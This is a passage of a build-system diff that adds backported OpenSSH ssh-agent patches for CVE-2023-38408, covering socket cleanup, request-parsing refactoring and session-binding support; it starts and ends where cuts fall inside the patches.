+ sockets table;
+
+also clear socket entries that are being marked as unused.
+
+spinkle in some debug2() spam to make it easier to watch an agent
+do its thing.
+
+ok markus
+
+OpenBSD-Commit-ID: 74582c8e82e96afea46f6c7b6813a429cbc75922
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/1fe16fd61bb53944ec510882acc0491abd66ff76]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-agent.c | 20 ++++++++++++++++----
+ 1 file changed, 16 insertions(+), 4 deletions(-)
+
+diff --git a/ssh-agent.c b/ssh-agent.c
+index 78f7268..2635bc5 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.264 2020/09/18 08:16:38 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.269 2021/01/26 00:47:47 djm Exp $ */
+ /*
+  * Author: Tatu Ylonen <ylo@cs.hut.fi>
+  * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -175,11 +175,12 @@ static void
+ close_socket(SocketEntry *e)
+ {
+	close(e->fd);
+-	e->fd = -1;
+-	e->type = AUTH_UNUSED;
+	sshbuf_free(e->input);
+	sshbuf_free(e->output);
+	sshbuf_free(e->request);
++	memset(e, '\0', sizeof(*e));
++	e->fd = -1;
++	e->type = AUTH_UNUSED;
+ }
+
+ static void
+@@ -249,6 +250,8 @@ process_request_identities(SocketEntry *e)
+	struct sshbuf *msg;
+	int r;
+
++	debug2("%s: entering", __func__);
++
+	if ((msg = sshbuf_new()) == NULL)
+		fatal("%s: sshbuf_new failed", __func__);
+	if ((r = sshbuf_put_u8(msg, SSH2_AGENT_IDENTITIES_ANSWER)) != 0 ||
+@@ -441,6 +444,7 @@ process_remove_identity(SocketEntry *e)
+	struct sshkey *key = NULL;
+	Identity *id;
+
++	debug2("%s: entering", __func__);
+	if ((r = sshkey_froms(e->request, &key)) != 0) {
+		error("%s: get key: %s", __func__, ssh_err(r));
+		goto done;
+@@ -467,6 +471,7 @@ process_remove_all_identities(SocketEntry *e)
+ {
+	Identity *id;
+
++	debug2("%s: entering", __func__);
+	/* Loop over all identities and clear the keys. */
+	for (id = TAILQ_FIRST(&idtab->idlist); id;
+	    id = TAILQ_FIRST(&idtab->idlist)) {
+@@ -520,6 +525,7 @@ process_add_identity(SocketEntry *e)
+	u_char ctype;
+	int r = SSH_ERR_INTERNAL_ERROR;
+
++	debug2("%s: entering", __func__);
+	if ((r = sshkey_private_deserialize(e->request, &k)) != 0 ||
+	    k == NULL ||
+	    (r = sshbuf_get_cstring(e->request, &comment, NULL)) != 0) {
+@@ -667,6 +673,7 @@ process_lock_agent(SocketEntry *e, int lock)
+	static u_int fail_count = 0;
+	size_t pwlen;
+
++	debug2("%s: entering", __func__);
+	/*
+	 * This is deliberately fatal: the user has requested that we lock,
+	 * but we can't parse their request properly. The only safe thing to
+@@ -738,6 +745,7 @@ process_add_smartcard_key(SocketEntry *e)
+	struct sshkey **keys = NULL, *k;
+	Identity *id;
+
++	debug2("%s: entering", __func__);
+	if ((r = sshbuf_get_cstring(e->request, &provider, NULL)) != 0 ||
+	    (r = sshbuf_get_cstring(e->request, &pin, NULL)) != 0) {
+		error("%s: buffer error: %s", __func__, ssh_err(r));
+@@ -818,6 +826,7 @@ process_remove_smartcard_key(SocketEntry *e)
+	int r, success = 0;
+	Identity *id, *nxt;
+
++	debug2("%s: entering", __func__);
+	if ((r = sshbuf_get_cstring(e->request, &provider, NULL)) != 0 ||
+	    (r = sshbuf_get_cstring(e->request, &pin, NULL)) != 0) {
+		error("%s: buffer error: %s", __func__, ssh_err(r));
+@@ -962,6 +971,8 @@ new_socket(sock_type type, int fd)
+ {
+	u_int i, old_alloc, new_alloc;
+
++	debug("%s: type = %s", __func__, type == AUTH_CONNECTION ? "CONNECTION" :
++	    (type == AUTH_SOCKET ? "SOCKET" : "UNKNOWN"));
+	set_nonblock(fd);
+
+	if (fd > max_fd)
+@@ -981,7 +992,8 @@ new_socket(sock_type type, int fd)
+		}
+	old_alloc = sockets_alloc;
+	new_alloc = sockets_alloc + 10;
+-	sockets = xreallocarray(sockets, new_alloc, sizeof(sockets[0]));
++	sockets = xrecallocarray(sockets, old_alloc, new_alloc,
++	    sizeof(sockets[0]));
+	for (i = old_alloc; i < new_alloc; i++)
+		sockets[i].type = AUTH_UNUSED;
+	sockets_alloc = new_alloc;
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-08.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-08.patch
new file mode 100644
index 0000000000..141c8113bf
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-08.patch
@@ -0,0 +1,315 @@
+From c30158ea225cf8ad67c3dcc88fa9e4afbf8959a7 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Tue, 26 Jan 2021 00:53:31 +0000
+Subject: [PATCH 08/12] upstream: more ssh-agent refactoring
+
+Allow confirm_key() to accept an additional reason suffix
+
+Factor publickey userauth parsing out into its own function and allow
+it to optionally return things it parsed out of the message to its
+caller.
+
+feedback/ok markus@
+
+OpenBSD-Commit-ID: 29006515617d1aa2d8b85cd2bf667e849146477e
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/e0e8bee8024fa9e31974244d14f03d799e5c0775]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-agent.c | 197 ++++++++++++++++++++++++++++++++++------------------
+ 1 file changed, 130 insertions(+), 67 deletions(-)
+
+diff --git a/ssh-agent.c b/ssh-agent.c
+index 2635bc5..7ad323c 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.269 2021/01/26 00:47:47 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.270 2021/01/26 00:53:31 djm Exp $ */
+ /*
+  * Author: Tatu Ylonen <ylo@cs.hut.fi>
+  * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -216,15 +216,16 @@ lookup_identity(struct sshkey *key)
+
+ /* Check confirmation of keysign request */
+ static int
+-confirm_key(Identity *id)
++confirm_key(Identity *id, const char *extra)
+ {
+	char *p;
+	int ret = -1;
+
+	p = sshkey_fingerprint(id->key, fingerprint_hash, SSH_FP_DEFAULT);
+	if (p != NULL &&
+-	    ask_permission("Allow use of key %s?\nKey fingerprint %s.",
+-	    id->comment, p))
++	    ask_permission("Allow use of key %s?\nKey fingerprint %s.%s%s",
++	    id->comment, p,
++	    extra == NULL ? "" : "\n", extra == NULL ? "" : extra))
+		ret = 0;
+	free(p);
+
+@@ -290,74 +291,133 @@ agent_decode_alg(struct sshkey *key, u_int flags)
+ }
+
+ /*
+- * This function inspects a message to be signed by a FIDO key that has a
+- * web-like application string (i.e. one that does not begin with "ssh:".
+- * It checks that the message is one of those expected for SSH operations
+- * (pubkey userauth, sshsig, CA key signing) to exclude signing challenges
+- * for the web.
++ * Attempt to parse the contents of a buffer as a SSH publickey userauth
++ * request, checking its contents for consistency and matching the embedded
++ * key against the one that is being used for signing.
++ * Note: does not modify msg buffer.
++ * Optionally extract the username and session ID from the request.
+  */
+ static int
+-check_websafe_message_contents(struct sshkey *key,
+-    const u_char *msg, size_t len)
++parse_userauth_request(struct sshbuf *msg, const struct sshkey *expected_key,
++    char **userp, struct sshbuf **sess_idp)
+ {
+-	int matched = 0;
+-	struct sshbuf *b;
+-	u_char m, n;
+-	char *cp1 = NULL, *cp2 = NULL;
++	struct sshbuf *b = NULL, *sess_id = NULL;
++	char *user = NULL, *service = NULL, *method = NULL, *pkalg = NULL;
+	int r;
++	u_char t, sig_follows;
+	struct sshkey *mkey = NULL;
+
+-	if ((b = sshbuf_from(msg, len)) == NULL)
+-		fatal("%s: sshbuf_new", __func__);
++	if (userp != NULL)
++		*userp = NULL;
++	if (sess_idp != NULL)
++		*sess_idp = NULL;
++	if ((b = sshbuf_fromb(msg)) == NULL)
++		fatal("%s: sshbuf_fromb", __func__);
+
+	/* SSH userauth request */
+-	if ((r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* sess_id */
+-	    (r = sshbuf_get_u8(b, &m)) == 0 && /* SSH2_MSG_USERAUTH_REQUEST */
+-	    (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* server user */
+-	    (r = sshbuf_get_cstring(b, &cp1, NULL)) == 0 && /* service */
+-	    (r = sshbuf_get_cstring(b, &cp2, NULL)) == 0 && /* method */
+-	    (r = sshbuf_get_u8(b, &n)) == 0 && /* sig-follows */
+-	    (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* alg */
+-	    (r = sshkey_froms(b, &mkey)) == 0 && /* key */
+-	    sshbuf_len(b) == 0) {
+-		debug("%s: parsed userauth", __func__);
+-		if (m == SSH2_MSG_USERAUTH_REQUEST && n == 1 &&
+-		    strcmp(cp1, "ssh-connection") == 0 &&
+-		    strcmp(cp2, "publickey") == 0 &&
+-		    sshkey_equal(key, mkey)) {
+-			debug("%s: well formed userauth", __func__);
+-			matched = 1;
+-		}
++	if ((r = sshbuf_froms(b, &sess_id)) != 0)
++		goto out;
++	if (sshbuf_len(sess_id) == 0) {
++		r = SSH_ERR_INVALID_FORMAT;
++		goto out;
+	}
+-	free(cp1);
+-	free(cp2);
+-	sshkey_free(mkey);
++	if ((r = sshbuf_get_u8(b, &t)) != 0 || /* SSH2_MSG_USERAUTH_REQUEST */
++	    (r = sshbuf_get_cstring(b, &user, NULL)) != 0 || /* server user */
++	    (r = sshbuf_get_cstring(b, &service, NULL)) != 0 || /* service */
++	    (r = sshbuf_get_cstring(b, &method, NULL)) != 0 || /* method */
++	    (r = sshbuf_get_u8(b, &sig_follows)) != 0 || /* sig-follows */
++	    (r = sshbuf_get_cstring(b, &pkalg, NULL)) != 0 || /* alg */
++	    (r = sshkey_froms(b, &mkey)) != 0) /* key */
++		goto out;
++	if (t != SSH2_MSG_USERAUTH_REQUEST ||
++	    sig_follows != 1 ||
++	    strcmp(service, "ssh-connection") != 0 ||
++	    !sshkey_equal(expected_key, mkey) ||
++	    sshkey_type_from_name(pkalg) != expected_key->type) {
++		r = SSH_ERR_INVALID_FORMAT;
++		goto out;
++	}
++	if (strcmp(method, "publickey") != 0) {
++		r = SSH_ERR_INVALID_FORMAT;
++		goto out;
++	}
++	if (sshbuf_len(b) != 0) {
++		r = SSH_ERR_INVALID_FORMAT;
++		goto out;
++	}
++	/* success */
++	r = 0;
++	debug("%s: well formed userauth", __func__);
++	if (userp != NULL) {
++		*userp = user;
++		user = NULL;
++	}
++	if (sess_idp != NULL) {
++		*sess_idp = sess_id;
++		sess_id = NULL;
++	}
++ out:
+	sshbuf_free(b);
+-	if (matched)
+-		return 1;
++	sshbuf_free(sess_id);
++	free(user);
++	free(service);
++	free(method);
++	free(pkalg);
++	sshkey_free(mkey);
++	return r;
++}
+
+-	if ((b = sshbuf_from(msg, len)) == NULL)
+-		fatal("%s: sshbuf_new", __func__);
+-	cp1 = cp2 = NULL;
+-	mkey = NULL;
+-
+-	/* SSHSIG */
+-	if ((r = sshbuf_cmp(b, 0, "SSHSIG", 6)) == 0 &&
+-	    (r = sshbuf_consume(b, 6)) == 0 &&
+-	    (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* namespace */
+-	    (r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* reserved */
+-	    (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* hashalg */
+-	    (r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* H(msg) */
+-	    sshbuf_len(b) == 0) {
+-		debug("%s: parsed sshsig", __func__);
+-		matched = 1;
+-	}
++/*
++ * Attempt to parse the contents of a buffer as a SSHSIG signature request.
++ * Note: does not modify buffer.
++ */
++static int
++parse_sshsig_request(struct sshbuf *msg)
++{
++	int r;
++	struct sshbuf *b;
+
++	if ((b = sshbuf_fromb(msg)) == NULL)
++		fatal("%s: sshbuf_fromb", __func__);
++
++	if ((r = sshbuf_cmp(b, 0, "SSHSIG", 6)) != 0 ||
++	    (r = sshbuf_consume(b, 6)) != 0 ||
++	    (r = sshbuf_get_cstring(b, NULL, NULL)) != 0 || /* namespace */
++	    (r = sshbuf_get_string_direct(b, NULL, NULL)) != 0 || /* reserved */
++	    (r = sshbuf_get_cstring(b, NULL, NULL)) != 0 || /* hashalg */
++	    (r = sshbuf_get_string_direct(b, NULL, NULL)) != 0) /* H(msg) */
++		goto out;
++	if (sshbuf_len(b) != 0) {
++		r = SSH_ERR_INVALID_FORMAT;
++		goto out;
++	}
++	/* success */
++	r = 0;
++ out:
+	sshbuf_free(b);
+-	if (matched)
++	return r;
++}
++
++/*
++ * This function inspects a message to be signed by a FIDO key that has a
++ * web-like application string (i.e. one that does not begin with "ssh:".
++ * It checks that the message is one of those expected for SSH operations
++ * (pubkey userauth, sshsig, CA key signing) to exclude signing challenges
++ * for the web.
++ */
++static int
++check_websafe_message_contents(struct sshkey *key, struct sshbuf *data)
++{
++	if (parse_userauth_request(data, key, NULL, NULL) == 0) {
++		debug("%s: signed data matches public key userauth request", __func__);
+		return 1;
++	}
++	if (parse_sshsig_request(data) == 0) {
++		debug("%s: signed data matches SSHSIG signature request", __func__);
++		return 1;
++	}
+
+-	/* XXX CA signature operation */
++	/* XXX check CA signature operation */
+
+	error("web-origin key attempting to sign non-SSH message");
+	return 0;
+@@ -367,21 +427,22 @@ check_websafe_message_contents(struct sshkey *key,
+ static void
+ process_sign_request2(SocketEntry *e)
+ {
+-	const u_char *data;
+	u_char *signature = NULL;
+-	size_t dlen, slen = 0;
++	size_t i, slen = 0;
+	u_int compat = 0, flags;
+	int r, ok = -1;
+	char *fp = NULL;
+-	struct sshbuf *msg;
++	struct sshbuf *msg = NULL, *data = NULL;
+	struct sshkey *key = NULL;
+	struct identity *id;
+	struct notifier_ctx *notifier = NULL;
+
+-	if ((msg = sshbuf_new()) == NULL)
++	debug("%s: entering", __func__);
++
++	if ((msg = sshbuf_new()) == NULL | (data = sshbuf_new()) == NULL)
+		fatal("%s: sshbuf_new failed", __func__);
+	if ((r = sshkey_froms(e->request, &key)) != 0 ||
+-	    (r = sshbuf_get_string_direct(e->request, &data, &dlen)) != 0 ||
++	    (r = sshbuf_get_stringb(e->request, data)) != 0 ||
+	    (r = sshbuf_get_u32(e->request, &flags)) != 0) {
+		error("%s: couldn't parse request: %s", __func__, ssh_err(r));
+		goto send;
+@@ -391,13 +452,13 @@ process_sign_request2(SocketEntry *e)
+		verbose("%s: %s key not found", __func__, sshkey_type(key));
+		goto send;
+	}
+-	if (id->confirm && confirm_key(id) != 0) {
++	if (id->confirm && confirm_key(id, NULL) != 0) {
+		verbose("%s: user refused key", __func__);
+		goto send;
+	}
+	if (sshkey_is_sk(id->key)) {
+		if (strncmp(id->key->sk_application, "ssh:", 4) != 0 &&
+-		    !check_websafe_message_contents(key, data, dlen)) {
++		    !check_websafe_message_contents(key, data)) {
+			/* error already logged */
+			goto send;
+		}
+@@ -411,7 +472,7 @@ process_sign_request2(SocketEntry *e)
+		}
+	}
+	if ((r = sshkey_sign(id->key, &signature, &slen,
+-	    data, dlen, agent_decode_alg(key, flags),
++	    sshbuf_ptr(data), sshbuf_len(data), agent_decode_alg(key, flags),
+	    id->sk_provider, compat)) != 0) {
+		error("%s: sshkey_sign: %s", __func__, ssh_err(r));
+		goto send;
+@@ -420,8 +481,7 @@ process_sign_request2(SocketEntry *e)
+	ok = 0;
+  send:
+	notify_complete(notifier);
+-	sshkey_free(key);
+-	free(fp);
++
+	if (ok == 0) {
+		if ((r = sshbuf_put_u8(msg, SSH2_AGENT_SIGN_RESPONSE)) != 0 ||
+		    (r = sshbuf_put_string(msg, signature, slen)) != 0)
+@@ -432,7 +492,10 @@ process_sign_request2(SocketEntry *e)
+	if ((r = sshbuf_put_stringb(e->output, msg)) != 0)
+		fatal("%s: buffer error: %s", __func__, ssh_err(r));
+
++	sshbuf_free(data);
+	sshbuf_free(msg);
++	sshkey_free(key);
++	free(fp);
+	free(signature);
+ }
+
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-09.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-09.patch
new file mode 100644
index 0000000000..b519ccce42
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-09.patch
@@ -0,0 +1,38 @@
+From 7adba46611e5d076d7d12d9f4162dd4cabd5ff50 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Fri, 29 Jan 2021 06:28:10 +0000
+Subject: [PATCH 09/12] upstream: give typedef'd struct a struct name; makes
+ the fuzzer I'm
+
+writing a bit easier
+
+OpenBSD-Commit-ID: 1052ab521505a4d8384d67acb3974ef81b8896cb
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/8afaa7d7918419d3da6c0477b83db2159879cb33]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-agent.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/ssh-agent.c b/ssh-agent.c
+index 7ad323c..c99927c 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.270 2021/01/26 00:53:31 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.274 2021/01/29 06:28:10 djm Exp $ */
+ /*
+  * Author: Tatu Ylonen <ylo@cs.hut.fi>
+  * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -108,7 +108,7 @@ typedef enum {
+	AUTH_CONNECTION
+ } sock_type;
+
+-typedef struct {
++typedef struct socket_entry {
+	int fd;
+	sock_type type;
+	struct sshbuf *input;
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-10.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-10.patch
new file mode 100644
index 0000000000..27b2eadfae
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-10.patch
@@ -0,0 +1,39 @@
+From 343e2a2c0ef754a7a86118016b248f7a73f8d510 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Fri, 29 Jan 2021 06:29:46 +0000
+Subject: [PATCH 10/12] upstream: fix the values of enum sock_type
+
+OpenBSD-Commit-ID: 18d048f4dbfbb159ff500cfc2700b8fb1407facd
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/1a4b92758690faa12f49079dd3b72567f909466d]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-agent.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/ssh-agent.c b/ssh-agent.c
+index c99927c..7f1e14b 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.274 2021/01/29 06:28:10 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.275 2021/01/29 06:29:46 djm Exp $ */
+ /*
+  * Author: Tatu Ylonen <ylo@cs.hut.fi>
+  * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -103,9 +103,9 @@
+ #define AGENT_RBUF_LEN	(4096)
+
+ typedef enum {
+-	AUTH_UNUSED,
+-	AUTH_SOCKET,
+-	AUTH_CONNECTION
++	AUTH_UNUSED = 0,
++	AUTH_SOCKET = 1,
++	AUTH_CONNECTION = 2,
+ } sock_type;
+
+ typedef struct socket_entry {
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-11.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-11.patch
new file mode 100644
index 0000000000..c300393ebf
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-11.patch
@@ -0,0 +1,307 @@
+From 2b3b369c8cf71f9ef5942a5e074e6f86e7ca1e0c Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Sun, 19 Dec 2021 22:09:23 +0000
+Subject: [PATCH 11/12] upstream: ssh-agent side of binding
+
+record session ID/hostkey/forwarding status for each active socket.
+
+Attempt to parse data-to-be-signed at signature request time and extract
+session ID from the blob if it is a pubkey userauth request.
+
+ok markus@
+
+OpenBSD-Commit-ID: a80fd41e292b18b67508362129e9fed549abd318
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/4c1e3ce85e183a9d0c955c88589fed18e4d6a058]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ authfd.h    |   3 +
+ ssh-agent.c | 175 +++++++++++++++++++++++++++++++++++++++++++++++++---
+ 2 files changed, 170 insertions(+), 8 deletions(-)
+
+diff --git a/authfd.h b/authfd.h
+index c3bf625..9cc9807 100644
+--- a/authfd.h
++++ b/authfd.h
+@@ -76,6 +76,9 @@ int	ssh_agent_sign(int sock, const struct sshkey *key,
+ #define SSH2_AGENTC_ADD_ID_CONSTRAINED		25
+ #define SSH_AGENTC_ADD_SMARTCARD_KEY_CONSTRAINED 26
+
++/* generic extension mechanism */
++#define SSH_AGENTC_EXTENSION			27
++
+ #define	SSH_AGENT_CONSTRAIN_LIFETIME		1
+ #define	SSH_AGENT_CONSTRAIN_CONFIRM		2
+ #define	SSH_AGENT_CONSTRAIN_MAXSIGN		3
+diff --git a/ssh-agent.c b/ssh-agent.c
+index 7f1e14b..01c7f2b 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.275 2021/01/29 06:29:46 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.280 2021/12/19 22:09:23 djm Exp $ */
+ /*
+  * Author: Tatu Ylonen <ylo@cs.hut.fi>
+  * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -98,9 +98,15 @@
+ #endif
+
+ /* Maximum accepted message length */
+-#define AGENT_MAX_LEN	(256*1024)
++#define AGENT_MAX_LEN		(256*1024)
+ /* Maximum bytes to read from client socket */
+-#define AGENT_RBUF_LEN	(4096)
++#define AGENT_RBUF_LEN		(4096)
++/* Maximum number of recorded session IDs/hostkeys per connection */
++#define AGENT_MAX_SESSION_IDS		16
++/* Maximum size of session ID */
++#define AGENT_MAX_SID_LEN		128
++
++/* XXX store hostkey_sid in a refcounted tree */
+
+ typedef enum {
+	AUTH_UNUSED = 0,
+@@ -108,12 +114,20 @@ typedef enum {
+	AUTH_CONNECTION = 2,
+ } sock_type;
+
++struct hostkey_sid {
++	struct sshkey *key;
++	struct sshbuf *sid;
++	int forwarded;
++};
++
+ typedef struct socket_entry {
+	int fd;
+	sock_type type;
+	struct sshbuf *input;
+	struct sshbuf *output;
+	struct sshbuf *request;
++	size_t nsession_ids;
++	struct hostkey_sid *session_ids;
+ } SocketEntry;
+
+ u_int sockets_alloc = 0;
+@@ -174,10 +188,17 @@ static int restrict_websafe = 1;
+ static void
+ close_socket(SocketEntry *e)
+ {
++	size_t i;
++
+	close(e->fd);
+	sshbuf_free(e->input);
+	sshbuf_free(e->output);
+	sshbuf_free(e->request);
++	for (i = 0; i < e->nsession_ids; i++) {
++		sshkey_free(e->session_ids[i].key);
++		sshbuf_free(e->session_ids[i].sid);
++	}
++	free(e->session_ids);
+	memset(e, '\0', sizeof(*e));
+	e->fd = -1;
+	e->type = AUTH_UNUSED;
+@@ -423,6 +444,18 @@ check_websafe_message_contents(struct sshkey *key, struct sshbuf *data)
+	return 0;
+ }
+
++static int
++buf_equal(const struct sshbuf *a, const struct sshbuf *b)
++{
++	if (sshbuf_ptr(a) == NULL || sshbuf_ptr(b) == NULL)
++		return SSH_ERR_INVALID_ARGUMENT;
++	if (sshbuf_len(a) != sshbuf_len(b))
++		return SSH_ERR_INVALID_FORMAT;
++	if (timingsafe_bcmp(sshbuf_ptr(a), sshbuf_ptr(b), sshbuf_len(a)) != 0)
++		return SSH_ERR_INVALID_FORMAT;
++	return 0;
++}
++
+ /* ssh2 only */
+ static void
+ process_sign_request2(SocketEntry *e)
+@@ -431,8 +464,8 @@ process_sign_request2(SocketEntry *e)
+	size_t i, slen = 0;
+	u_int compat = 0, flags;
+	int r, ok = -1;
+-	char *fp = NULL;
+-	struct sshbuf *msg = NULL, *data = NULL;
++	char *fp = NULL, *user = NULL, *sig_dest = NULL;
++	struct sshbuf *msg = NULL, *data = NULL, *sid = NULL;
+	struct sshkey *key = NULL;
+	struct identity *id;
+	struct notifier_ctx *notifier = NULL;
+@@ -452,7 +485,33 @@ process_sign_request2(SocketEntry *e)
+		verbose("%s: %s key not found", __func__, sshkey_type(key));
+		goto send;
+	}
+-	if (id->confirm && confirm_key(id, NULL) != 0) {
++	/*
++	 * If session IDs were recorded for this socket, then use them to
++	 * annotate the confirmation messages with the host keys.
++	 */
++	if (e->nsession_ids > 0 &&
++	    parse_userauth_request(data, key, &user, &sid) == 0) {
++		/*
++		 * session ID from userauth request should match the final
++		 * ID in the list recorded in the socket, unless the ssh
++		 * client at that point lacks the binding extension (or if
++		 * an attacker is trying to steal use of the agent).
++		 */
++		i = e->nsession_ids - 1;
++		if (buf_equal(sid, e->session_ids[i].sid) == 0) {
++			if ((fp = sshkey_fingerprint(e->session_ids[i].key,
++			    SSH_FP_HASH_DEFAULT, SSH_FP_DEFAULT)) == NULL)
++				fatal("%s: fingerprint failed", __func__);
++			debug3("%s: destination %s %s (slot %zu)", __func__,
++			    sshkey_type(e->session_ids[i].key), fp, i);
++			xasprintf(&sig_dest, "public key request for "
++			    "target user \"%s\" to %s %s", user,
++			    sshkey_type(e->session_ids[i].key), fp);
++			free(fp);
++			fp = NULL;
++		}
++	}//
++	if (id->confirm && confirm_key(id, sig_dest) != 0) {
+		verbose("%s: user refused key", __func__);
+		goto send;
+	}
+@@ -467,8 +526,10 @@ process_sign_request2(SocketEntry *e)
+			    SSH_FP_DEFAULT)) == NULL)
+				fatal("%s: fingerprint failed", __func__);
+			notifier = notify_start(0,
+-			    "Confirm user presence for key %s %s",
+-			    sshkey_type(id->key), fp);
++			    "Confirm user presence for key %s %s%s%s",
++			    sshkey_type(id->key), fp,
++			    sig_dest == NULL ? "" : "\n",
++			    sig_dest == NULL ? "" : sig_dest);
+		}
+	}
+	if ((r = sshkey_sign(id->key, &signature, &slen,
+@@ -492,11 +553,14 @@ process_sign_request2(SocketEntry *e)
+	if ((r = sshbuf_put_stringb(e->output, msg)) != 0)
+		fatal("%s: buffer error: %s", __func__, ssh_err(r));
+
++	sshbuf_free(sid);
+	sshbuf_free(data);
+	sshbuf_free(msg);
+	sshkey_free(key);
+	free(fp);
+	free(signature);
++	free(sig_dest);
++	free(user);
+ }
+
+ /* shared */
+@@ -925,6 +989,98 @@ send:
+ }
+ #endif /* ENABLE_PKCS11 */
+
++static int
++process_ext_session_bind(SocketEntry *e)
++{
++	int r, sid_match, key_match;
++	struct sshkey *key = NULL;
++	struct sshbuf *sid = NULL, *sig = NULL;
++	char *fp = NULL;
++	u_char fwd;
++	size_t i;
++
++	debug2("%s: entering", __func__);
++	if ((r = sshkey_froms(e->request, &key)) != 0 ||
++	    (r = sshbuf_froms(e->request, &sid)) != 0 ||
++	    (r = sshbuf_froms(e->request, &sig)) != 0 ||
++	    (r = sshbuf_get_u8(e->request, &fwd)) != 0) {
++		error("%s: parse: %s", __func__, ssh_err(r));
++		goto out;
++	}
++	if ((fp = sshkey_fingerprint(key, SSH_FP_HASH_DEFAULT,
++	    SSH_FP_DEFAULT)) == NULL)
++		fatal("%s: fingerprint failed", __func__);
++	/* check signature with hostkey on session ID */
++	if ((r = sshkey_verify(key, sshbuf_ptr(sig), sshbuf_len(sig),
++	    sshbuf_ptr(sid), sshbuf_len(sid), NULL, 0, NULL)) != 0) {
++		error("%s: sshkey_verify for %s %s: %s", __func__, sshkey_type(key), fp, ssh_err(r));
++		goto out;
++	}
++	/* check whether sid/key already recorded */
++	for (i = 0; i < e->nsession_ids; i++) {
++		sid_match = buf_equal(sid, e->session_ids[i].sid) == 0;
++		key_match = sshkey_equal(key, e->session_ids[i].key);
++		if (sid_match && key_match) {
++			debug("%s: session ID already recorded for %s %s", __func__,
++			    sshkey_type(key), fp);
++			r = 0;
++			goto out;
++		} else if (sid_match) {
++			error("%s: session ID recorded against different key "
++			    "for %s %s", __func__, sshkey_type(key), fp);
++			r = -1;
++			goto out;
++		}
++		/*
++		 * new sid with previously-seen key can happen, e.g. multiple
++		 * connections to the same host.
++		 */
++	}
++	/* record new key/sid */
++	if (e->nsession_ids >= AGENT_MAX_SESSION_IDS) {
++		error("%s: too many session IDs recorded", __func__);
++		goto out;
++	}
++	e->session_ids = xrecallocarray(e->session_ids, e->nsession_ids,
++	    e->nsession_ids + 1, sizeof(*e->session_ids));
++	i = e->nsession_ids++;
++	debug("%s: recorded %s %s (slot %zu of %d)", __func__, sshkey_type(key), fp, i,
++	    AGENT_MAX_SESSION_IDS);
++	e->session_ids[i].key = key;
++	e->session_ids[i].forwarded = fwd != 0;
++	key = NULL; /* transferred */
++	/* can't transfer sid; it's refcounted and scoped to request's life */
++	if ((e->session_ids[i].sid = sshbuf_new()) == NULL)
